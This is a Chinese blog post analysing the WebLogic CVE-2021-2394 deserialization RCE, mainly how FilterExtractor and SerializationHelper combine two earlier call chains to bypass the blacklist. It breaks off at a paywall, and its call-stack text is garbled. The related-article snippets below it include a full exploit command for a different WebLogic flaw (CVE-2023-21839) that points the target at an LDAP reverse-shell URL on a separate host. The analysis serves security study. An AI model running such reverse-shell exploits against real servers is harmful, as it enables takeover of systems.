WebLogic CVE-2021-2394 RCE 漏洞分析

最新推荐文章于 2025-11-24 14:24:11 发布
原创 最新推荐文章于 2025-11-24 14:24:11 发布 · 2.7k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #信息安全 #安全漏洞

本文详细分析了WebLogic Server的CVE-2021-2394远程代码执行漏洞,该漏洞通过二次反序列化,结合CVE-2020-14756和CVE-2020-14825的调用链,绕过黑名单实现。漏洞关键在于FilterExtractor类和SerializationHelper类的交互,导致安全绕过并触发RCE。

在这里插入图片描述

漏洞简述

2021年3月15日墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server RCE漏洞,2021年7月21日Oracle发布了致谢信息。

这是一个二次反序列化漏洞,是cve-2020-14756和cve-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。

漏洞分析

最开始我是发现了oracle.eclipselink.coherence.integrated.internal.cache.SerializationHelper类中的readAttributeAccessor方法

在这里插入图片描述

在这个方法中实例化了MethodAttributeAccessor类,在MethodAttributeAccessor类中的getAttributeValueFromObject方法存在反射调用

在这里插入图片描述

这里就是CVE-2020-14825的触发点,在14825中就是LockVersionExtractor和MethodAttributeAccessor的调用链来进行RCE的,这两个类都已经加入到黑名单列表中。而SerializationHelper类的readAttributeAccessor方法被FilterExtractor的readExternal方法调用了

在这里插入图片描述

最重要的是FilterExtractor类的extract方法和LockVersionExtractor类的extract方法一样都调用了getAttributeValueFromObject方法

在这里插入图片描述

那这里就产生绕过了,虽然LockVersionExtractor和MethodAttributeAccessor类都在黑名单列表里面,但是FilterExtractor类可以替代LockVersionExtractor类,并且在FilterExtractor类的readExternal方法调用了SerializationHelper.readAttributeAccessor,SerializationHelper.readAttributeAccessor方法中又实例化了MethodAttributeAccessor类。

但是这里还不能直接触发,FilterExtractor类的readExternal方法为DataInput类型不是ObjectInput,这里就要利用CVE-2020-14756前部分的调用链,简单来说14756是一个二次反序列化的调用链,WebLogic自身实现了一套readObject反序列化过程,自定义的这一套需要实现ExternalizableLite接口,它的readExternal参数是DataInput类型。

在这里插入图片描述

看下CVE-2020-14756前部分需要用到的调用链

compare:416, SortedBag W r a p p e r C o m p a r a t o r ( c o m . t a n g o s o l . u t i l ) c o m p a r e : 1295 , T r e e M a p ( j a v a . u t i l ) p u t : 538 , T r e e M a p ( j a v a . u t i l ) a d d : 152 , S o r t e d B a g ( c o m . t a n g o s o l . u t i l ) a d d

最低0.47元/天 解锁文章
WebLogic反序列化漏洞复现+利用工具(CVE-2021-2394)
0xSec
04-08 5112
Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在授权的情况下通过IIOP、T3协议对存在漏洞WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。
weblogic LDAP远程代码执行 CVE-2021-2109
课嗨教育的专栏
02-01 2359
漏洞影响版本 WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0 漏洞复现 搭建实验环境,我这里直接使用vulhub里weblogic CVE-2020-14882的环境 访问http://192.168.2.131:7001,出现以下界面说明搭建成功 访问以下路径,如果
网安渗透测试教程—RCE远程代码执行漏洞详解!零基础小白入门教程建议收藏!
最新发布
2302_76672693的博客
11-24 987
RCE(Remote Code Execution)远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞,攻击者可以利用它来执行远程代码,从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中,攻击者可以通过输入恶意构造的指令或数据,使得应用程序或软件在执行时执行攻击者指定的代码。RCE的范围比较广,只要渗透的最终结果可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE,通常情况下RCE漏洞都可以归为高危漏洞
WebLogic 反序列化漏洞(CVE-2019-2890)复现(超详细)
渗透之路,攻防之间皆学问
03-16 1万+
目录 一. 漏洞介绍 二. 影响范围 三. 漏洞环境搭建 四. 漏洞复现 五. 漏洞修复 六. 漏洞检测poc 很多漏洞复现文章都不够详细,就是你按照他写的去复现会出很多很多的问题。我综合了几篇文章,写下这最详细的复现步骤。希望能帮助大家少走弯路 一. 漏洞介绍 2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号CVE-2019-2890。 Weblogi...
WebLogic反序列化漏洞(CVE_2021_2394)
m0_51330619的博客
09-12 3907
本次利用vulhub靶场的/weblogic/CVE-2020-14882靶机复现 攻击机环境与工具:jdk1.8,JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,CVE_2021_2394.jar http://dnslog.cn/ 在dnslog.cn点击get subdomain,得到url urjxbx.dnslog.cn 使用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar java -jar JNDI-Inj
【web安全】Weblogic CVE-2021-2394 分析
qq_53058639的博客
01-06 396
2021年7月21日,Oracle官方 发布了一系列安全更新。涉及旗下产品(Weblogic Server、Database Server、Java SE、MySQL等)的 342 个漏洞WebLogic Server 产品中有高危漏洞漏洞编号CVE-2021-2594,CVSS 评分9.8分,影响多个 WebLogic 版本,且漏洞利用难度低,可基于 T3 和 IIOP 协议执行远程代码。
精选资源
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。 容易利用的漏洞使高特权攻击者可以通过HTTP...
CVE-2023-21839 weblogic rce漏洞复现
wutiangui的博客
11-04 2758
C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。执行以上命令可以在dnslog上获得回显,即可验证可能存在漏洞。复现之前请务必切换路径到jdk路径下。
精选资源
【技术分享】WebLogic CVE-2021-2135分析及POC构造遇到的问题 .pdf
09-05
漏洞编号CVE-2021-2135,涉及WebLogic服务器中的反序列化问题,可能导致远程代码执行(RCE)风险。在2021年4月,WebLogic发布了相关的安全公告,并提供了补丁以修复漏洞。然而,对于不熟悉此类漏洞分析的技术...
cve-2021-2394 weblogic反序列化漏洞分析
小陈的博客
08-10 872
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Weblogic反序列化漏洞分析CVE-2021-2394
shelter1234567的博客
02-02 1705
Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在授权的情况下通过IIOP、T3协议对存在漏洞WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。剧透一下:这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。...} else {......//抽象方法...此类的。
weblogicrce poc
12-21
weblogicrce 测试脚本,使用该工具可以对weblogicrce服务进行检测和利用
Weblogic RCE + confluence RCE + cacti RCE正反向代理靶场
Love&Share
04-07 3033
与实际区别。
CVE-2023-21839 WebLogic Server RCE分析
Jay
04-18 1055
在后续的进行lookup操作之前会检查 JNDI 环境是否已正确配置以访问远程资源,主要是对jndiEnvironment和remoteJNDIName的检测,如果在if中的任何一个条件为真,那么将调用对象的lookup方法,如果 if 语句中的所有条件都为假,则会进入检查cachedReferent字段的阶段。weblogic10 及以后的版本,不能直接使用server/lib 目录下的 weblogic.jar 了,需要手动执行一个命令生成手动生成 wlfullclient.jar。
CVE-2021-4034漏洞复现
热门推荐
weixin_42618425的博客
01-26 2万+
CVE-2021-4034漏洞复现 CVE-2021-4034漏洞描述 最近网上公开了CVE-2021-4034漏洞详情,该漏洞主要是由于 Linux 下 Polkit 工具集的本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权限。目前该漏洞PoC已公开。 影响范围 影响版本:由于 polkit 为系统预装工具,目前主流Linux版本均受影响。 修复版本: CentOS系列: CentOS 6:polkit-0.96-11.el6_10.2 CentOS 7:polkit-0.112-26.el
Microsoft 已经发布了5月份关于修复其产品中安全问题的报告。
ptsecurity的博客
05-17 1664
Microsoft 已经发布了5月份关于修复其产品中安全问题的报告。
热门开源Dompdf PHP 库中存在严重漏洞
smellycat000的专栏
02-03 1001
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士开源的Dompdf PHP库中存在一个高危漏洞 (CVE-2023-23924),如遭利用,可导致攻击者在目标服务器上远程执行代码。开发人员 Bsweeney 在安全公告中指出,“攻击者如果能够向dompdf 提供SVG文件,则可能利用该漏洞调用具有任意协议的任意URL。在PHP 8.0.0之前版本中,该漏洞可导致任意反序列化,从而导致任意文件删...
验证WebLogic CVE-2018-2628漏洞的POC工具使用
CVE-2018-2628漏洞是指在WebLogic服务器中存在一个远程代码执行(RCE漏洞,该漏洞允许经认证的远程攻击者通过特定的网络请求在受影响的服务器上执行任意代码。这个漏洞由Oracle在2018年修补,编号CVE-2018-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值